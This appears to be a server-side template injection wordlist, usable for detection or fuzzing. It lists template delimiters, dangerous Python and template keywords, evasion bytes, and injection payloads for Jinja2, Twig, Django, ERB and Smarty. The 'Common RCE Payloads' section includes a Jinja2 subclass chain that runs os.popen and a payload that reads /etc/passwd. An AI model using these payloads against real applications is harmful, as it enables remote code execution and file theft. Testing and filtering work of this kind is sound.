# Generic Template Syntax
{{
}}
{%
%}
#{
}
${
<%=
%>
[[
]]
((
))
~~
# Dangerous Functions & Objects
self
template
env
config
settings
request
response
session
globals
locals
vars
dir
dict
class
subclasses
mro
base
builtins
import
eval
exec
compile
open
read
write
file
os
sys
commands
subprocess
popen
system
chr
ord
getattr
setattr
delattr
__class__
__init__
__globals__
__builtins__
__import__
__subclasses__
__mro__
__base__
__bases__
# Jinja2
{{7*7}}
{{config}}
{{request.environ}}
{{self.__dict__}}
{{''.__class__.__mro__[1].__subclasses__()}}
# Twig
{{_self.env}}
{{_self.env.getFilter('exec')}}
{{['id']|filter('system')}}
# Django Templates
{% debug %}
{% include "file.txt" %}
{% load module %}
# Ruby ERB
<%= 7*7 %>
<%= Dir.entries('/') %>
<%= system('id') %>
# JavaScript
<%- 7*7 %>
#{7*7}
${7*7}
# Smarty
{system('id')}
{php}echo `id`;{/php}
# Evasion Techniques
\x00
\x0a
\x0d
\u0000
${"7*7"}
{{'7'*'7'}}
# Common RCE Payloads
{{os.popen('id').read()}}
{{system('cat /etc/passwd')}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if x.__name__=='catch_warnings' %}{{x()._module.__builtins__['__import__']('os').popen('id').read()}}{% endif %}{% endfor %}
# Framework-Specific Keywords
flask
django
jinja
twig
smarty
handlebars
ejs
pug
velocity
freemarker
thymeleaf
